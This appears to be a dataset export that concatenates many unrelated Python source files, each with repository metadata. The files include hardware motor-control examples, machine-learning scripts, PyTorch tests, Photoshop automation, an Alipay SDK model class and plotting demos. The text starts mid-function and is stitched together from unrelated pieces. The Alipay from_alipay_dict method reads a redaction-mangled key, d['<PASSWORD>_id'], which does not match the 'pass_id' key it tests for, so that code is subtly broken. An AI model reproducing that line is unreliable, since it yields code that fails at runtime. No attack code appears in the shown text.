and ((x + y % 2 * 3) % 6) % 4 == 0
)
):
row[x] = self.char
else:
row[x] = self.bg
def get_children(self) -> "list":
"""Return an empty list of the container's children."""
return []
|
Software/Python/grove_mini_motor_driver/driver_example.py | benmcclelland/GrovePi | 482 | 11090587 | <gh_stars>100-1000
#!/usr/bin/env python3
#
# The GrovePi connects the Raspberry Pi and Grove sensors. You can learn more about GrovePi here: http://www.dexterindustries.com/GrovePi
#
# Have a question about this example? Ask on the forums here: http://forum.dexterindustries.com/c/grovepi
#
'''
## License
The MIT License (MIT)
GrovePi for the Raspberry Pi: an open source platform for connecting Grove Sensors to the Raspberry Pi.
Copyright (C) 2017 Dexter Industries
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
from grove_mini_motor_driver import MiniMotorDriver
from grove_mini_motor_driver import left_channel, right_channel
from time import sleep
import sys
# if you use the incorporated feedbacker (aka setDisplayFaults)
# whenever there's a shortage of current or if the motors stalls
# it appears on the screen as a warning
#
# Please take a look in the terminal_log_example.txt to get a feeling
# of what this program outputs
#
# Here is some fault feedback:
#
# [04-Apr-2017 19:06:08.188770][left motor warning][undervoltage lockout]
# [04-Apr-2017 19:06:08.190704][right motor warning][undervoltage lockout]
# [04-Apr-2017 19:21:17.990704][right motor warning][overcurrent event]
# [04-Apr-2017 19:23:11.768320][right motor warning][extended current limit event]
# [04-Apr-2017 19:25:08.330140][right motor warning][overtemperature condition]
# [04-Apr-2017 19:38:54.781218][right motor warning][unknown condition]
# Don't forget to run it with Python 3 !!
# Don't forget to run it with Python 3 !!
# Don't forget to run it with Python 3 !!
def Main():
# initialize an object of the motor driver class
# with the appropiate channel address
# we can also add a 3rd argument which is a SMBus objeclt
# in case we don't want to let the class instantiate it
driver = MiniMotorDriver(left_channel, right_channel)
# enable display feedback/output of motors status
# alternatively we can use driver.setDisplayFaults(False) to disable it
driver.setDisplayFaults()
# increase the power to the motors from 0% -> 100% in 5 seconds
# motors rotate in tandem
for percent in range(101):
driver.moveForward(percent)
sleep(0.05)
# stay at 100% power for 2 seconds
sleep(2)
# and then move backwards at 50% thrust for another 2 seconds
driver.moveBackwards(50)
sleep(2)
# stop the motors immediately -> driver opposes an electromotive force
# in order to stop the motors faster rather then cutting the power
driver.stopMotors()
# stay off for 1 second
sleep(1)
# and then set the right motor to FORWARD direction at 70% thrust
driver.setRightMotor('FORWARD', 70)
# and keep this going for 5 seconds
sleep(5)
# while it's spinning, completely reverse the thrust
# for another 5 seconds
driver.setRightMotor('REVERSE', 70)
sleep(5)
# then set the motors rotate in opposing directions
# such a command would make a GopiGo rotate in the same spot
# do this for one second
driver.setRightMotor('FORWARD', 50)
driver.setLeftMotor('REVERSE', 50)
sleep(1)
# and disable motors
# it's different then the stopMotors() function
# because it just cuts power definitely and
# puts the motor driver in a low-power state
driver.disableMotors()
if __name__ == "__main__":
try:
# it's the above function we call
Main()
# in case CTRL-C / CTRL-D keys are pressed (or anything else that might interrupt)
except KeyboardInterrupt:
print('[Keyboard interrupted]')
sys.exit(0)
# in case there's an IO error aka I2C
except IOError:
print('[IO Error]')
sys.exit(0)
|
predict.py | ahmedbesbes/character-based-cnn | 233 | 11090605 | <reponame>ahmedbesbes/character-based-cnn
import argparse
import torch
import torch.nn.functional as F
from src.model import CharacterLevelCNN
from src import utils
use_cuda = torch.cuda.is_available()
def predict(args):
model = CharacterLevelCNN(args, args.number_of_classes)
state = torch.load(args.model)
model.load_state_dict(state)
model.eval()
processed_input = utils.preprocess_input(args)
processed_input = torch.tensor(processed_input)
processed_input = processed_input.unsqueeze(0)
if use_cuda:
processed_input = processed_input.to("cuda")
model = model.to("cuda")
prediction = model(processed_input)
probabilities = F.softmax(prediction, dim=1)
probabilities = probabilities.detach().cpu().numpy()
return probabilities
if __name__ == "__main__":
parser = argparse.ArgumentParser(
"Testing a pretrained Character Based CNN for text classification"
)
parser.add_argument("--model", type=str, help="path for pre-trained model")
parser.add_argument("--text", type=str, default="I love pizza!", help="text string")
parser.add_argument("--steps", nargs="+", default=["lower"])
# arguments needed for the predicition
parser.add_argument(
"--alphabet",
type=str,
default="abcdefghijklmnopqrstuvwxyz0123456789-,;.!?:'\"/\\|_@#$%^&*~`+ =<>()[]{}",
)
parser.add_argument("--number_of_characters", type=int, default=69)
parser.add_argument("--extra_characters", type=str, default="éàèùâêîôûçëïü")
parser.add_argument("--max_length", type=int, default=300)
parser.add_argument("--number_of_classes", type=int, default=2)
args = parser.parse_args()
prediction = predict(args)
print("input : {}".format(args.text))
print("prediction : {}".format(prediction))
|
benchmarks/operator_benchmark/common/tests/jit_forward_test.py | Hacky-DH/pytorch | 60,067 | 11090610 | <gh_stars>1000+
import operator_benchmark as op_bench
import torch
intraop_bench_configs = op_bench.config_list(
attrs=[
[8, 16],
],
attr_names=["M", "N"],
tags=["short"],
)
@torch.jit.script
def torch_sumall(a, iterations):
# type: (Tensor, int)
result = 0.0
for _ in range(iterations):
result += float(torch.sum(a))
a[0][0] += 0.01
return result
class TorchSumBenchmark(op_bench.TorchBenchmarkBase):
def init(self, M, N):
self.input_one = torch.rand(M, N)
self.set_module_name("sum")
# This is a very temporary method and will be removed soon, so
# don't use this method in your benchmark
# TODO(mingzhe): use one forward method for both JIT and Eager
def jit_forward(self, iters):
return torch_sumall(self.input_one, iters)
op_bench.generate_pt_test(intraop_bench_configs, TorchSumBenchmark)
if __name__ == "__main__":
op_bench.benchmark_runner.main()
|
tests/test_util_input.py | NoahH99/Warcoat | 163 | 11090690 | <filename>tests/test_util_input.py
import unittest
from datetime import datetime, timedelta
from rowboat.util.input import parse_duration
class TestRuleMatcher(unittest.TestCase):
def test_basic_durations(self):
dt = parse_duration('1w2d3h4m5s')
self.assertTrue(dt < (datetime.utcnow() + timedelta(days=10)))
self.assertTrue(dt > (datetime.utcnow() + timedelta(days=7)))
def test_source_durations(self):
origin = datetime.utcnow() + timedelta(days=17)
dt = parse_duration('1w2d3h4m5s', source=origin)
compare = (origin - datetime.utcnow()) + datetime.utcnow()
self.assertTrue(dt < (compare + timedelta(days=10)))
self.assertTrue(dt > (compare + timedelta(days=7)))
def test_invalid_duration(self):
self.assertEquals(parse_duration('mmmmm', safe=True), None)
|
examples/emboss_action.py | MrTeferi/photoshop-python-api | 270 | 11090724 | # Import local modules
from photoshop import Session
with Session() as ps:
app = ps.app
for index, x in enumerate(range(50)):
# Execute an existing action from action palette.
idPly = app.charIDToTypeID("Ply ")
desc8 = ps.ActionDescriptor()
idnull = app.charIDToTypeID("null")
ref3 = ps.ActionReference()
idActn = app.charIDToTypeID("Actn")
ref3.putName(idActn, "Sepia Toning (layer)")
idASet = app.charIDToTypeID("ASet")
ref3.PutName(idASet, "Default Actions")
desc8.putReference(idnull, ref3)
app.executeAction(idPly, desc8, ps.DialogModes.DisplayNoDialogs)
# Create solid color fill layer.
idMk = app.charIDToTypeID("Mk ")
desc21 = ps.ActionDescriptor()
idNull = app.charIDToTypeID("null")
ref12 = ps.ActionReference()
idContentLayer1 = app.stringIDToTypeID("contentLayer")
ref12.putClass(idContentLayer1)
desc21.putReference(idNull, ref12)
idUsng = app.charIDToTypeID("Usng")
desc22 = ps.ActionDescriptor()
idType = app.charIDToTypeID("Type")
desc23 = ps.ActionDescriptor()
idClr = app.charIDToTypeID("Clr ")
desc24 = ps.ActionDescriptor()
idRd = app.charIDToTypeID("Rd ")
desc24.putDouble(idRd, index)
idGrn = app.charIDToTypeID("Grn ")
desc24.putDouble(idGrn, index)
idBl = app.charIDToTypeID("Bl ")
desc24.putDouble(idBl, index)
idRGBC = app.charIDToTypeID("RGBC")
desc23.putObject(idClr, idRGBC, desc24)
idSolidColorLayer = app.StringIDToTypeID("solidColorLayer")
desc22.putObject(idType, idSolidColorLayer, desc23)
idContentLayer2 = app.StringIDToTypeID("contentLayer")
desc21.putObject(idUsng, idContentLayer2, desc22)
app.executeAction(idMk, desc21, ps.DialogModes.DisplayNoDialogs)
# Select mask.
idSlct = app.charIDToTypeID("slct")
desc38 = ps.ActionDescriptor()
idNull1 = app.charIDToTypeID("null")
ref20 = ps.ActionReference()
idChnl1 = app.charIDToTypeID("Chnl")
idChnl2 = app.charIDToTypeID("Chnl")
idMsk = app.charIDToTypeID("Msk ")
ref20.putEnumerated(idChnl1, idChnl2, idMsk)
desc38.putReference(idNull1, ref20)
idMkVs = app.charIDToTypeID("MkVs")
desc38.putBoolean(idMkVs, False)
app.executeAction(idSlct, desc38, ps.DialogModes.DisplayNoDialogs)
app.activeDocument.activeLayer.invert()
|
src/causallift/nodes/estimate_propensity.py | Minyus/causallift | 265 | 11090787 | <reponame>Minyus/causallift<gh_stars>100-1000
import logging
import pandas as pd
from .utils import * # NOQA
log = logging.getLogger(__name__)
try:
import matplotlib.pyplot as plt
except: # NOQA
print("[Warning] Could not import matplotlib.pyplot. ")
def fit_propensity(args, df):
X_train = df.xs("train")[args.cols_features]
y_train = df.xs("train")[args.col_treatment]
# X_test = df.xs("test")[args.cols_features]
# y_test = df.xs("test")[args.col_treatment]
# """ Transfrom by StandardScaler """
# from sklearn import preprocessing
# scaler = preprocessing.StandardScaler().fit(X_train)
# X_train = scaler.transform(X_train)
# X_test = scaler.transform(X_test)
# """ Transform by PCA """
# from sklearn.decomposition import PCA
# pca = PCA(0.99)
# pca.fit(X_train)
# X_train = pca.transform(X_train)
# X_test = pca.transform(X_test)
model = initialize_model(args, model_key="propensity_model_params")
if args.verbose >= 2:
log.info("## Propensity scores will be estimated by logistic regression.")
if args.verbose >= 3:
log.info(
"### Parameters for grid search of Logistic regression:\n{}".format(
args.propensity_model_params
)
)
model.fit(X_train, y_train)
best_estimator = (
model.best_estimator_ if hasattr(model, "best_estimator_") else model
)
estimator_params = best_estimator.get_params()
if "steps" in estimator_params:
best_estimator = estimator_params["steps"][-1][1]
estimator_params = best_estimator.get_params()
if args.verbose >= 3:
log.info(
"### Best parameter for logistic regression:\n{}".format(estimator_params)
)
if args.verbose >= 2:
log.info("\n## Coefficients of logistic regression:")
coef_df = pd.DataFrame(
best_estimator.coef_.reshape(1, -1),
columns=args.cols_features,
index=["coefficient"],
)
apply_method(coef_df, args.df_print)
return model
def estimate_propensity(args, df, model):
X_train = df.xs("train")[args.cols_features]
y_train = df.xs("train")[args.col_treatment]
X_test = df.xs("test")[args.cols_features]
y_test = df.xs("test")[args.col_treatment]
proba_train = model.predict_proba(X_train)[:, 1]
proba_test = model.predict_proba(X_test)[:, 1]
if args.verbose >= 3:
log.info("\n### Histogram of propensity score for train and test data:")
pd.Series(proba_train).hist()
pd.Series(proba_test).hist()
try:
plt.show()
except: # NOQA
log.info("[Warning] Could not show the histogram.")
# Optional evaluation and report of logistic regression
if args.verbose >= 3:
y_pred_train = model.predict(X_train)
y_pred_test = model.predict(X_test)
log.info(
"\n### Score Table for logistic regression to calculate propensity score:"
)
apply_method(
score_df(y_train, y_test, y_pred_train, y_pred_test), args.df_print
)
# if args.verbose >= 3:
log.info("\n### Confusion Matrix for Train:")
apply_method(conf_mat_df(y_train, y_pred_train), args.df_print)
# if args.verbose >= 3:
log.info("\n### Confusion Matrix for Test:")
apply_method(conf_mat_df(y_test, y_pred_test), args.df_print)
train_df = df.xs("train")
test_df = df.xs("test")
train_df.loc[:, args.col_propensity] = proba_train
test_df.loc[:, args.col_propensity] = proba_test
df = concat_train_test_df(args, train_df, test_df)
return df
def schedule_propensity_scoring(args, df):
args.need_propensity_scoring = args.enable_ipw and (
args.col_propensity not in df.columns
)
if not args.need_propensity_scoring:
if args.enable_ipw:
if args.verbose >= 2:
log.info(
"Skip estimation of propensity score because "
"{} column found in the data frame. ".format(args.col_propensity)
)
else:
if args.verbose >= 2:
log.info(
"Skip estimation of propensity score because "
'"enable_ipw" is set to False.'
)
return args
|
plato/algorithms/mistnet.py | cuiboyuan/plato | 135 | 11090807 | """
The PyTorch-based MistNet algorithm, used by both the client and the server.
Reference:
<NAME>, et al. "MistNet: Towards Private Neural Network Training with Local
Differential Privacy," found in docs/papers.
"""
import logging
import time
import torch
from plato.algorithms import fedavg
from plato.datasources import feature_dataset
from plato.config import Config
class Algorithm(fedavg.Algorithm):
"""The PyTorch-based MistNet algorithm, used by both the client and the
server.
"""
def extract_features(self, dataset, sampler, cut_layer: str):
"""Extracting features using layers before the cut_layer.
dataset: The training or testing dataset.
cut_layer: Layers before this one will be used for extracting features.
"""
self.model.eval()
_train_loader = getattr(self.trainer, "train_loader", None)
if callable(_train_loader):
data_loader = self.trainer.train_loader(batch_size=1,
trainset=dataset,
sampler=sampler.get(),
extract_features=True)
else:
data_loader = torch.utils.data.DataLoader(
dataset,
batch_size=Config().trainer.batch_size,
sampler=sampler.get())
tic = time.perf_counter()
feature_dataset = []
for inputs, targets, *__ in data_loader:
with torch.no_grad():
logits = self.model.forward_to(inputs, cut_layer)
feature_dataset.append((logits, targets))
toc = time.perf_counter()
logging.info("[Client #%s] Time used: %.2f seconds.", self.client_id,
toc - tic)
return feature_dataset
def train(self, trainset, sampler, cut_layer=None):
""" Train the neural network model after the cut layer. """
self.trainer.train(
feature_dataset.FeatureDataset(trainset.feature_dataset), sampler,
cut_layer)
|
slam/odometry/posenet_odometry.py | Pandinosaurus/pyLiDAR-SLAM | 130 | 11090836 | <reponame>Pandinosaurus/pyLiDAR-SLAM
from pathlib import Path
from typing import Dict, Union, Any
import numpy as np
# Hydra and OmegaConf
from hydra.core.config_store import ConfigStore
from omegaconf import MISSING, DictConfig
from hydra.conf import dataclass
# Project Imports
from slam.common.pose import Pose
from slam.common.timer import *
from slam.odometry import *
from slam.odometry.odometry import OdometryAlgorithm, OdometryConfig
from slam.training.prediction_modules import _PoseNetPredictionModule
# ----------------------------------------------------------------------------------------------------------------------
@dataclass
class PoseNetOdometryConfig(OdometryConfig):
"""
The Configuration for the Point-To-Plane ICP based Iterative Least Square estimation of the pose
"""
debug: bool = False
viz_mode: str = "aggregated"
algorithm: str = "posenet"
train_dir: str = MISSING # The directory where the posenet_config and checkpoint file should be searched in
train_config_file: str = "config.yaml" # Default value set by ATrainer
checkpoint_file: str = "checkpoint.ckp" # Default value set by ATrainer
device: str = MISSING
pose: str = MISSING
posenet_config: Dict[str, Any] = MISSING
# Hydra -- Add a PoseNetOdometryCfonig
cs = ConfigStore.instance()
cs.store(name="poseresnet18", node=PoseNetOdometryConfig(posenet_config={"type": "poseresnet",
"model": 18}),
package="odometry.posenet_config")
# ----------------------------------------------------------------------------------------------------------------------
class PoseNetOdometry(OdometryAlgorithm):
"""Deep Odometry"""
def __init__(self, config: Union[PoseNetOdometryConfig, DictConfig],
pose: Pose = Pose("euler"),
device: torch.device = torch.device("cpu"),
**kwargs):
OdometryAlgorithm.__init__(self, config)
# Set variables needed by the module
self.device = device
self.pose = pose
# Loads the train config from the disk
train_dir = Path(config.train_dir)
assert_debug(train_dir.exists())
train_config_path = train_dir / config.train_config_file
checkpoint_path = train_dir / config.checkpoint_file
assert_debug(train_config_path.exists() and checkpoint_path.exists())
self.checkpoint_path = str(checkpoint_path)
# Reads the prediction config from the dict
with open(str(train_config_path), "r") as stream:
train_config = OmegaConf.load(stream)
prediction_config: DictConfig = train_config["training"]["prediction"]
# Construct the Prediction module from the config read from disk
self.prediction_module = _PoseNetPredictionModule(prediction_config,
pose=self.pose)
self.prediction_module = self.prediction_module.to(self.device)
# ----------------------
# Local variable
self.previous_vertex_map = None
self._iter = 0
self.relative_poses = []
def init(self):
"""
Initializes the Odometry algorithm
Clears the persisted relative poses, reset the _iter to 0
And loads the module parameters from disk
"""
super().init()
self.relative_poses = []
self._iter = 0
# Load the parameters of the model from the config
state_dict = torch.load(self.checkpoint_path)
self.prediction_module.load_state_dict(state_dict["prediction_module"])
def do_process_next_frame(self, data_dict: dict):
"""
Registers the new frame
"""
vertex_map = data_dict["vertex_map"]
if self._iter == 0:
self.previous_vertex_map = vertex_map.unsqueeze(0)
self._iter += 1
self.relative_poses.append(np.eye(4, dtype=np.float32).reshape(1, 4, 4))
return
pair_vmap = torch.cat([self.previous_vertex_map, vertex_map.unsqueeze(0)], dim=1)
with torch.no_grad():
output_dict = self.prediction_module(dict(vertex_map=pair_vmap))
pose_params = output_dict["pose_params"]
new_rpose = self.pose.build_pose_matrix(pose_params)
# Update the state of the odometry
self.previous_vertex_map = vertex_map.unsqueeze(0)
self.relative_poses.append(new_rpose.cpu().numpy())
self._iter += 1
def get_relative_poses(self) -> np.ndarray:
return np.concatenate(self.relative_poses, axis=0)
|
intro/matplotlib/examples/pretty_plots/plot_grid_ext.py | zmoon/scipy-lecture-notes | 2,538 | 11090880 | <gh_stars>1000+
"""
Grid elaborate
===============
An example displaying a grid on the axes and tweaking the layout.
"""
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator
fig = plt.figure(figsize=(8, 6), dpi=72, facecolor="white")
axes = plt.subplot(111)
axes.set_xlim(0, 4)
axes.set_ylim(0, 3)
axes.xaxis.set_major_locator(MultipleLocator(1.0))
axes.xaxis.set_minor_locator(MultipleLocator(0.1))
axes.yaxis.set_major_locator(MultipleLocator(1.0))
axes.yaxis.set_minor_locator(MultipleLocator(0.1))
axes.grid(which='major', axis='x', linewidth=0.75, linestyle='-', color='0.75')
axes.grid(which='minor', axis='x', linewidth=0.25, linestyle='-', color='0.75')
axes.grid(which='major', axis='y', linewidth=0.75, linestyle='-', color='0.75')
axes.grid(which='minor', axis='y', linewidth=0.25, linestyle='-', color='0.75')
axes.set_xticklabels([])
axes.set_yticklabels([])
# Add a title and a box around it
from matplotlib.patches import FancyBboxPatch
ax = plt.gca()
ax.add_patch(FancyBboxPatch((-0.05, .87),
width=.66, height=.165, clip_on=False,
boxstyle="square,pad=0", zorder=3,
facecolor='white', alpha=1.0,
transform=plt.gca().transAxes))
plt.text(-0.05, 1.02, " Grid: plt.grid(...)\n",
horizontalalignment='left',
verticalalignment='top',
size='xx-large',
transform=axes.transAxes)
plt.text(-0.05, 1.01, "\n\n Draw ticks and grid ",
horizontalalignment='left',
verticalalignment='top',
size='large',
transform=axes.transAxes)
|
alipay/aop/api/domain/PassInstanceDetail.py | snowxmas/alipay-sdk-python-all | 213 | 11090917 | <filename>alipay/aop/api/domain/PassInstanceDetail.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.BizParamKeyValue import BizParamKeyValue
class PassInstanceDetail(object):
def __init__(self):
self._biz_param_list = None
self._channel_id = None
self._create_time = None
self._end_date = None
self._is_deleted = None
self._logo = None
self._logo_text = None
self._modify_time = None
self._pass_id = None
self._product = None
self._serial_number = None
self._start_date = None
self._status = None
self._strip = None
self._tpl_id = None
self._type = None
self._user_id = None
@property
def biz_param_list(self):
return self._biz_param_list
@biz_param_list.setter
def biz_param_list(self, value):
if isinstance(value, list):
self._biz_param_list = list()
for i in value:
if isinstance(i, BizParamKeyValue):
self._biz_param_list.append(i)
else:
self._biz_param_list.append(BizParamKeyValue.from_alipay_dict(i))
@property
def channel_id(self):
return self._channel_id
@channel_id.setter
def channel_id(self, value):
self._channel_id = value
@property
def create_time(self):
return self._create_time
@create_time.setter
def create_time(self, value):
self._create_time = value
@property
def end_date(self):
return self._end_date
@end_date.setter
def end_date(self, value):
self._end_date = value
@property
def is_deleted(self):
return self._is_deleted
@is_deleted.setter
def is_deleted(self, value):
self._is_deleted = value
@property
def logo(self):
return self._logo
@logo.setter
def logo(self, value):
self._logo = value
@property
def logo_text(self):
return self._logo_text
@logo_text.setter
def logo_text(self, value):
self._logo_text = value
@property
def modify_time(self):
return self._modify_time
@modify_time.setter
def modify_time(self, value):
self._modify_time = value
@property
def pass_id(self):
return self._pass_id
@pass_id.setter
def pass_id(self, value):
self._pass_id = value
@property
def product(self):
return self._product
@product.setter
def product(self, value):
self._product = value
@property
def serial_number(self):
return self._serial_number
@serial_number.setter
def serial_number(self, value):
self._serial_number = value
@property
def start_date(self):
return self._start_date
@start_date.setter
def start_date(self, value):
self._start_date = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def strip(self):
return self._strip
@strip.setter
def strip(self, value):
self._strip = value
@property
def tpl_id(self):
return self._tpl_id
@tpl_id.setter
def tpl_id(self, value):
self._tpl_id = value
@property
def type(self):
return self._type
@type.setter
def type(self, value):
self._type = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.biz_param_list:
if isinstance(self.biz_param_list, list):
for i in range(0, len(self.biz_param_list)):
element = self.biz_param_list[i]
if hasattr(element, 'to_alipay_dict'):
self.biz_param_list[i] = element.to_alipay_dict()
if hasattr(self.biz_param_list, 'to_alipay_dict'):
params['biz_param_list'] = self.biz_param_list.to_alipay_dict()
else:
params['biz_param_list'] = self.biz_param_list
if self.channel_id:
if hasattr(self.channel_id, 'to_alipay_dict'):
params['channel_id'] = self.channel_id.to_alipay_dict()
else:
params['channel_id'] = self.channel_id
if self.create_time:
if hasattr(self.create_time, 'to_alipay_dict'):
params['create_time'] = self.create_time.to_alipay_dict()
else:
params['create_time'] = self.create_time
if self.end_date:
if hasattr(self.end_date, 'to_alipay_dict'):
params['end_date'] = self.end_date.to_alipay_dict()
else:
params['end_date'] = self.end_date
if self.is_deleted:
if hasattr(self.is_deleted, 'to_alipay_dict'):
params['is_deleted'] = self.is_deleted.to_alipay_dict()
else:
params['is_deleted'] = self.is_deleted
if self.logo:
if hasattr(self.logo, 'to_alipay_dict'):
params['logo'] = self.logo.to_alipay_dict()
else:
params['logo'] = self.logo
if self.logo_text:
if hasattr(self.logo_text, 'to_alipay_dict'):
params['logo_text'] = self.logo_text.to_alipay_dict()
else:
params['logo_text'] = self.logo_text
if self.modify_time:
if hasattr(self.modify_time, 'to_alipay_dict'):
params['modify_time'] = self.modify_time.to_alipay_dict()
else:
params['modify_time'] = self.modify_time
if self.pass_id:
if hasattr(self.pass_id, 'to_alipay_dict'):
params['pass_id'] = self.pass_id.to_alipay_dict()
else:
params['pass_id'] = self.pass_id
if self.product:
if hasattr(self.product, 'to_alipay_dict'):
params['product'] = self.product.to_alipay_dict()
else:
params['product'] = self.product
if self.serial_number:
if hasattr(self.serial_number, 'to_alipay_dict'):
params['serial_number'] = self.serial_number.to_alipay_dict()
else:
params['serial_number'] = self.serial_number
if self.start_date:
if hasattr(self.start_date, 'to_alipay_dict'):
params['start_date'] = self.start_date.to_alipay_dict()
else:
params['start_date'] = self.start_date
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
if self.strip:
if hasattr(self.strip, 'to_alipay_dict'):
params['strip'] = self.strip.to_alipay_dict()
else:
params['strip'] = self.strip
if self.tpl_id:
if hasattr(self.tpl_id, 'to_alipay_dict'):
params['tpl_id'] = self.tpl_id.to_alipay_dict()
else:
params['tpl_id'] = self.tpl_id
if self.type:
if hasattr(self.type, 'to_alipay_dict'):
params['type'] = self.type.to_alipay_dict()
else:
params['type'] = self.type
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = PassInstanceDetail()
if 'biz_param_list' in d:
o.biz_param_list = d['biz_param_list']
if 'channel_id' in d:
o.channel_id = d['channel_id']
if 'create_time' in d:
o.create_time = d['create_time']
if 'end_date' in d:
o.end_date = d['end_date']
if 'is_deleted' in d:
o.is_deleted = d['is_deleted']
if 'logo' in d:
o.logo = d['logo']
if 'logo_text' in d:
o.logo_text = d['logo_text']
if 'modify_time' in d:
o.modify_time = d['modify_time']
if 'pass_id' in d:
o.pass_id = d['<PASSWORD>_id']
if 'product' in d:
o.product = d['product']
if 'serial_number' in d:
o.serial_number = d['serial_number']
if 'start_date' in d:
o.start_date = d['start_date']
if 'status' in d:
o.status = d['status']
if 'strip' in d:
o.strip = d['strip']
if 'tpl_id' in d:
o.tpl_id = d['tpl_id']
if 'type' in d:
o.type = d['type']
if 'user_id' in d:
o.user_id = d['user_id']
return o
|
docs/user_guide/main_usage/monte_carlo_integration.py | utsekaj42/chaospy | 333 | 11090924 | <gh_stars>100-1000
from problem_formulation import joint
sobol_samples = joint.sample(10000, rule="sobol")
antithetic_samples = joint.sample(10000, antithetic=True, seed=1234)
halton_samples = joint.sample(10000, rule="halton")
|
test/nn/norm/test_instance_norm.py | mrmotallebi/pytorch_geometric | 12,651 | 11090928 | <reponame>mrmotallebi/pytorch_geometric
import pytest
import torch
from torch_geometric.nn import InstanceNorm
@pytest.mark.parametrize('conf', [True, False])
def test_instance_norm(conf):
batch = torch.zeros(100, dtype=torch.long)
x1 = torch.randn(100, 16)
x2 = torch.randn(100, 16)
norm1 = InstanceNorm(16, affine=conf, track_running_stats=conf)
norm2 = InstanceNorm(16, affine=conf, track_running_stats=conf)
assert norm1.__repr__() == 'InstanceNorm(16)'
torch.jit.script(norm1)
out1 = norm1(x1)
out2 = norm2(x1, batch)
assert out1.size() == (100, 16)
assert torch.allclose(out1, out2, atol=1e-7)
if conf:
assert torch.allclose(norm1.running_mean, norm2.running_mean)
assert torch.allclose(norm1.running_var, norm2.running_var)
out1 = norm1(x2)
out2 = norm2(x2, batch)
assert torch.allclose(out1, out2, atol=1e-7)
if conf:
assert torch.allclose(norm1.running_mean, norm2.running_mean)
assert torch.allclose(norm1.running_var, norm2.running_var)
norm1.eval()
norm2.eval()
out1 = norm1(x1)
out2 = norm2(x1, batch)
assert torch.allclose(out1, out2, atol=1e-7)
out1 = norm1(x2)
out2 = norm2(x2, batch)
assert torch.allclose(out1, out2, atol=1e-7)
out1 = norm2(x1)
out2 = norm2(x2)
out3 = norm2(torch.cat([x1, x2], dim=0), torch.cat([batch, batch + 1]))
assert torch.allclose(out1, out3[:100], atol=1e-7)
assert torch.allclose(out2, out3[100:], atol=1e-7)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.